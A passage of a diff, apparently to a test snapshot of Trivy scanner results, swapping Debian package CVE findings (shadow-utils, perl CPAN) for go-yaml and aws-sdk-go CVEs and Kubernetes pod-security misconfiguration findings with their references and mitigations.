"https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", + "value": "https://github.com/aws/aws-sdk-go/commit/ae9b9fd92af132cfd8d879809d8611825ba135f4", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", + "value": "https://github.com/aws/aws-sdk-go/pull/3403", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2013-4235", + "value": "https://github.com/google/security-research/security/advisories/GHSA-7f33-f4f5-xwgw", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-26", + "value": "https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5745-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-8912", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5745-2", + "value": "https://pkg.go.dev/vuln/GO-2022-0646", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2013-4235", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-8912", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-19882", - "installedVersion": "1:4.8.1-1", - "packageName": "passwd", + "fixedVersion": "3.0.0-20220521103104-8f96da9f5d5e", + "foundIn": "Target: 'lurker' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-28948", + "installedVersion": "v3.0.0-20210107192922-496545a6307b", + "packageName": "gopkg.in/yaml.v3", "references": [ - "https://access.redhat.com/security/cve/CVE-2019-19882", - "https://bugs.archlinux.org/task/64836", - "https://bugs.gentoo.org/702252", - "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", - "https://github.com/shadow-maint/shadow/pull/199", - "https://github.com/void-linux/void-packages/pull/17580", - "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", - "https://security.gentoo.org/glsa/202008-09", - "https://www.cve.org/CVERecord?id=CVE-2019-19882", + "https://access.redhat.com/security/cve/CVE-2022-28948", + "https://github.com/advisories/GHSA-hp87-p4gw-j4gq", + "https://github.com/go-yaml/yaml/commit/8f96da9f5d5eff988554c1aae1784627c4bf6754", + "https://github.com/go-yaml/yaml/issues/666", + "https://nvd.nist.gov/vuln/detail/CVE-2022-28948", + "https://security.netapp.com/advisory/ntap-20220923-0006/", + "https://www.cve.org/CVERecord?id=CVE-2022-28948", ], }, "category": "Vulnerability", - "description": "shadow 4.8, in certain circumstances affecting at least Gentoo, Arch Linux, and Void Linux, allows local users to obtain root access because setuid programs are misconfigured. Specifically, this affects shadow 4.8 when compiled using --with-libpam but without explicitly passing --disable-account-tools-setuid, and without a PAM configuration suitable for use with setuid account management tools. This combination leads to account management tools (groupadd, groupdel, groupmod, useradd, userdel, usermod) that can easily be used by unprivileged local users to escalate privileges to root in multiple ways. This issue became much more relevant in approximately December 2019 when an unrelated bug was fixed (i.e., the chmod calls to suidusbins were fixed in the upstream Makefile which is now included in the release version 4.8).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "An issue in the Unmarshal function in Go-Yaml v3 causes the program to crash when attempting to deserialize invalid input.", + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", "mitigation": undefined, - "name": "shadow-utils: local users can obtain root access because setuid programs are misconfigured", + "name": "crash when attempting to deserialize invalid input", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-19882", + "value": "https://avd.aquasec.com/nvd/cve-2022-28948", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-19882", + "value": "https://access.redhat.com/security/cve/CVE-2022-28948", }, { "type": "URL", - "value": "https://bugs.archlinux.org/task/64836", + "value": "https://github.com/advisories/GHSA-hp87-p4gw-j4gq", }, { "type": "URL", - "value": "https://bugs.gentoo.org/702252", + "value": "https://github.com/go-yaml/yaml/commit/8f96da9f5d5eff988554c1aae1784627c4bf6754", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", + "value": "https://github.com/go-yaml/yaml/issues/666", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/pull/199", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-28948", }, { "type": "URL", - "value": "https://github.com/void-linux/void-packages/pull/17580", + "value": "https://security.netapp.com/advisory/ntap-20220923-0006/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-28948", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Job/scan-trivy-k8s-dnnfb' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV011", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "https://avd.aquasec.com/misconfig/ksv011", + ], + }, + "category": "Misconfiguration", + "description": "Enforcing CPU limits prevents DoS via resource exhaustion.", + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", + "mitigation": "Set a limit value under 'containers[].resources.limits.cpu'.", + "name": "CPU not limited(Container 'trivy' of Job 'scan-trivy-k8s-dnnfb' should set 'resources.limits.cpu')", + "references": [ { "type": "URL", - "value": "https://security.gentoo.org/glsa/202008-09", + "value": "https://avd.aquasec.com/misconfig/ksv011", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-19882", + "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", }, ], "severity": "LOW", @@ -96074,62 +97044,57 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-29383", - "installedVersion": "1:4.8.1-1", - "packageName": "passwd", + "foundIn": "Target: 'Job/scan-trivy-k8s-dnnfb' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV012", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "https://access.redhat.com/security/cve/CVE-2023-29383", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", - "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", - "https://github.com/shadow-maint/shadow/pull/687", - "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", - "https://www.cve.org/CVERecord?id=CVE-2023-29383", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", - "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv012", ], }, - "category": "Vulnerability", - "description": "In Shadow 4.13, it is possible to inject control characters into fields provided to the SUID program chfn (change finger). Although it is not possible to exploit this directly (e.g., adding a new user fails because \\n is in the block list), it is possible to misrepresent the /etc/passwd file when viewed. Use of \\r manipulations and Unicode characters to work around blocking of the : character make it possible to give the impression that a new user has been added. In other words, an adversary may be able to convince a system administrator to take the system offline (an indirect, social-engineered denial of service) by demonstrating that "cat /etc/passwd" shows a rogue user account.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "Improper input validation in shadow-utils package utility chfn", + "category": "Misconfiguration", + "description": "'runAsNonRoot' forces the running image to run as a non-root user to ensure least privileges.", + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", + "mitigation": "Set 'containers[].securityContext.runAsNonRoot' to true.", + "name": "Runs as root user(Container 'trivy' of Job 'scan-trivy-k8s-dnnfb' should set 'securityContext.runAsNonRoot' to true)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-29383", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-29383", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", - }, - { - "type": "URL", - "value": "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", - }, - { - "type": "URL", - "value": "https://github.com/shadow-maint/shadow/pull/687", - }, - { - "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", + "value": "https://avd.aquasec.com/misconfig/ksv012", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-29383", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Job/scan-trivy-k8s-dnnfb' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV014", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", + "https://avd.aquasec.com/misconfig/ksv014", + ], + }, + "category": "Misconfiguration", + "description": "An immutable root file system prevents applications from writing to their local disk. This can limit intrusions, as attackers will not be able to tamper with the file system or write foreign executables to disk.", + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", + "mitigation": "Change 'containers[].securityContext.readOnlyRootFilesystem' to 'true'.", + "name": "Root file system is not read-only(Container 'trivy' of Job 'scan-trivy-k8s-dnnfb' should set 'securityContext.readOnlyRootFilesystem' to true)", + "references": [ { "type": "URL", - "value": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", + "value": "https://avd.aquasec.com/misconfig/ksv014", }, { "type": "URL", - "value": "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", + "value": "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", }, ], "severity": "LOW", @@ -96137,1926 +97102,2795 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-16156", - "installedVersion": "5.32.1-4+deb11u2", - "packageName": "perl-base", + "foundIn": "Target: 'Job/scan-trivy-k8s-dnnfb' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV015", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "http://blogs.perl.org/users/neilb/2021/11/addressing-cpan-vulnerabilities-related-to-checksums.html", - "https://access.redhat.com/security/cve/CVE-2020-16156", - "https://blog.hackeriet.no/cpan-signature-verification-vulnerabilities/", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16156", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SD6RYOJII7HRJ6WVORFNVTYNOFY5JDXN/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SZ32AJIV4RHJMLWLU5QULGKMMIHYOMDC/", - "https://metacpan.org/pod/distribution/CPAN/scripts/cpan", - "https://nvd.nist.gov/vuln/detail/CVE-2020-16156", - "https://ubuntu.com/security/notices/USN-5689-1", - "https://ubuntu.com/security/notices/USN-5689-2", - "https://www.cve.org/CVERecord?id=CVE-2020-16156", + "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "https://avd.aquasec.com/misconfig/ksv015", ], }, - "category": "Vulnerability", - "description": "CPAN 2.28 allows Signature Verification Bypass.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "perl-CPAN: Bypass of verification of signatures in CHECKSUMS files", + "category": "Misconfiguration", + "description": "When containers have resource requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", + "mitigation": "Set 'containers[].resources.requests.cpu'.", + "name": "CPU requests not specified(Container 'trivy' of Job 'scan-trivy-k8s-dnnfb' should set 'resources.requests.cpu')", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-16156", + "value": "https://avd.aquasec.com/misconfig/ksv015", }, { "type": "URL", - "value": "http://blogs.perl.org/users/neilb/2021/11/addressing-cpan-vulnerabilities-related-to-checksums.html", + "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Job/scan-trivy-k8s-dnnfb' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV016", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-resources-limits-memory/", + "https://avd.aquasec.com/misconfig/ksv016", + ], + }, + "category": "Misconfiguration", + "description": "When containers have memory requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", + "mitigation": "Set 'containers[].resources.requests.memory'.", + "name": "Memory requests not specified(Container 'trivy' of Job 'scan-trivy-k8s-dnnfb' should set 'resources.requests.memory')", + "references": [ { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-16156", + "value": "https://avd.aquasec.com/misconfig/ksv016", }, { "type": "URL", - "value": "https://blog.hackeriet.no/cpan-signature-verification-vulnerabilities/", + "value": "https://kubesec.io/basics/containers-resources-limits-memory/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Job/scan-trivy-k8s-dnnfb' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV018", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-resources-limits-memory/", + "https://avd.aquasec.com/misconfig/ksv018", + ], + }, + "category": "Misconfiguration", + "description": "Enforcing memory limits prevents DoS via resource exhaustion.", + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", + "mitigation": "Set a limit value under 'containers[].resources.limits.memory'.", + "name": "Memory not limited(Container 'trivy' of Job 'scan-trivy-k8s-dnnfb' should set 'resources.limits.memory')", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16156", + "value": "https://avd.aquasec.com/misconfig/ksv018", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SD6RYOJII7HRJ6WVORFNVTYNOFY5JDXN/", + "value": "https://kubesec.io/basics/containers-resources-limits-memory/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Job/scan-trivy-k8s-dnnfb' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV020", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv020", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", + "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", + "name": "Runs with low user ID(Container 'lurker' of Job 'scan-trivy-k8s-dnnfb' should set 'securityContext.runAsUser' > 10000)", + "references": [ { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SZ32AJIV4RHJMLWLU5QULGKMMIHYOMDC/", + "value": "https://avd.aquasec.com/misconfig/ksv020", }, { "type": "URL", - "value": "https://metacpan.org/pod/distribution/CPAN/scripts/cpan", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Job/scan-trivy-k8s-dnnfb' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV020", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv020", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", + "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", + "name": "Runs with low user ID(Container 'trivy' of Job 'scan-trivy-k8s-dnnfb' should set 'securityContext.runAsUser' > 10000)", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-16156", + "value": "https://avd.aquasec.com/misconfig/ksv020", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5689-1", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Job/scan-trivy-k8s-dnnfb' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV021", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv021", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", + "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", + "name": "Runs with low group ID(Container 'lurker' of Job 'scan-trivy-k8s-dnnfb' should set 'securityContext.runAsGroup' > 10000)", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5689-2", + "value": "https://avd.aquasec.com/misconfig/ksv021", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-16156", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-31484", - "installedVersion": "5.32.1-4+deb11u2", - "packageName": "perl-base", + "foundIn": "Target: 'Job/scan-trivy-k8s-dnnfb' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV021", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "http://www.openwall.com/lists/oss-security/2023/04/29/1", - "http://www.openwall.com/lists/oss-security/2023/05/03/3", - "http://www.openwall.com/lists/oss-security/2023/05/03/5", - "http://www.openwall.com/lists/oss-security/2023/05/07/2", - "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-31484", - "https://github.com/andk/cpanpm/commit/9c98370287f4e709924aee7c58ef21c85289a7f0 (2.35-TRIAL)", - "https://github.com/andk/cpanpm/pull/175", - "https://metacpan.org/dist/CPAN/changes", - "https://ubuntu.com/security/notices/USN-6112-1", - "https://ubuntu.com/security/notices/USN-6112-2", - "https://www.openwall.com/lists/oss-security/2023/04/18/14", + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv021", ], }, - "category": "Vulnerability", - "description": "CPAN.pm before 2.35 does not verify TLS certificates when downloading distributions over HTTPS.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "CPAN.pm before 2.35 does not verify TLS certificates when downloading ...", + "category": "Misconfiguration", + "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", + "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", + "name": "Runs with low group ID(Container 'trivy' of Job 'scan-trivy-k8s-dnnfb' should set 'securityContext.runAsGroup' > 10000)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-31484", - }, - { - "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/04/29/1", + "value": "https://avd.aquasec.com/misconfig/ksv021", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/03/3", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Job/scan-trivy-k8s-dnnfb' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV030", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv030", + ], + }, + "category": "Misconfiguration", + "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", + "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", + "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", + "references": [ { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/03/5", + "value": "https://avd.aquasec.com/misconfig/ksv030", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/07/2", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Job/scan-trivy-k8s-dnnfb' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV030", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv030", + ], + }, + "category": "Misconfiguration", + "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", + "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", + "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", + "references": [ { "type": "URL", - "value": "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", + "value": "https://avd.aquasec.com/misconfig/ksv030", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-31484", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Job/scan-trivy-k8s-dnnfb' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV106", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv106", + ], + }, + "category": "Misconfiguration", + "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", + "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", + "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", + "references": [ { "type": "URL", - "value": "https://github.com/andk/cpanpm/commit/9c98370287f4e709924aee7c58ef21c85289a7f0 (2.35-TRIAL)", + "value": "https://avd.aquasec.com/misconfig/ksv106", }, { "type": "URL", - "value": "https://github.com/andk/cpanpm/pull/175", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Job/scan-trivy-k8s-dnnfb' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV106", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv106", + ], + }, + "category": "Misconfiguration", + "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", + "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", + "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", + "references": [ { "type": "URL", - "value": "https://metacpan.org/dist/CPAN/changes", + "value": "https://avd.aquasec.com/misconfig/ksv106", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6112-1", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Role/system:controller:bootstrap-signer' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV049", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv049", + ], + }, + "category": "Misconfiguration", + "description": "Some workloads leverage configmaps to store sensitive data or configuration parameters that affect runtime behavior that can be modified by an attacker or combined with another issue to potentially lead to compromise.", + "location": "scb://trivy/?Namespace=kube-public&Kind=Role&Name=system:controller:bootstrap-signer", + "mitigation": "Remove write permission verbs for resource 'configmaps'", + "name": "Do not allow management of configmaps(Role 'system:controller:bootstrap-signer' should not have access to resource 'configmaps' for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6112-2", + "value": "https://avd.aquasec.com/misconfig/ksv049", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2023/04/18/14", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2011-4116", - "installedVersion": "5.32.1-4+deb11u2", - "packageName": "perl-base", + "foundIn": "Target: 'Role/system::leader-locking-kube-controller-manager' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV049", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "http://www.openwall.com/lists/oss-security/2011/11/04/2", - "http://www.openwall.com/lists/oss-security/2011/11/04/4", - "https://access.redhat.com/security/cve/CVE-2011-4116", - "https://github.com/Perl-Toolchain-Gang/File-Temp/issues/14", - "https://nvd.nist.gov/vuln/detail/CVE-2011-4116", - "https://rt.cpan.org/Public/Bug/Display.html?id=69106", - "https://seclists.org/oss-sec/2011/q4/238", - "https://www.cve.org/CVERecord?id=CVE-2011-4116", + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv049", ], }, - "category": "Vulnerability", - "description": "_is_safe in the File::Temp module for Perl does not properly handle symlinks.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "perl: File::Temp insecure temporary file handling", + "category": "Misconfiguration", + "description": "Some workloads leverage configmaps to store sensitive data or configuration parameters that affect runtime behavior that can be modified by an attacker or combined with another issue to potentially lead to compromise.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Role&Name=system::leader-locking-kube-controller-manager", + "mitigation": "Remove write permission verbs for resource 'configmaps'", + "name": "Do not allow management of configmaps(Role 'system::leader-locking-kube-controller-manager' should not have access to resource 'configmaps' for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2011-4116", - }, - { - "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2011/11/04/2", + "value": "https://avd.aquasec.com/misconfig/ksv049", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2011/11/04/4", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Role/system::leader-locking-kube-scheduler' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV049", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv049", + ], + }, + "category": "Misconfiguration", + "description": "Some workloads leverage configmaps to store sensitive data or configuration parameters that affect runtime behavior that can be modified by an attacker or combined with another issue to potentially lead to compromise.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Role&Name=system::leader-locking-kube-scheduler", + "mitigation": "Remove write permission verbs for resource 'configmaps'", + "name": "Do not allow management of configmaps(Role 'system::leader-locking-kube-scheduler' should not have access to resource 'configmaps' for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", 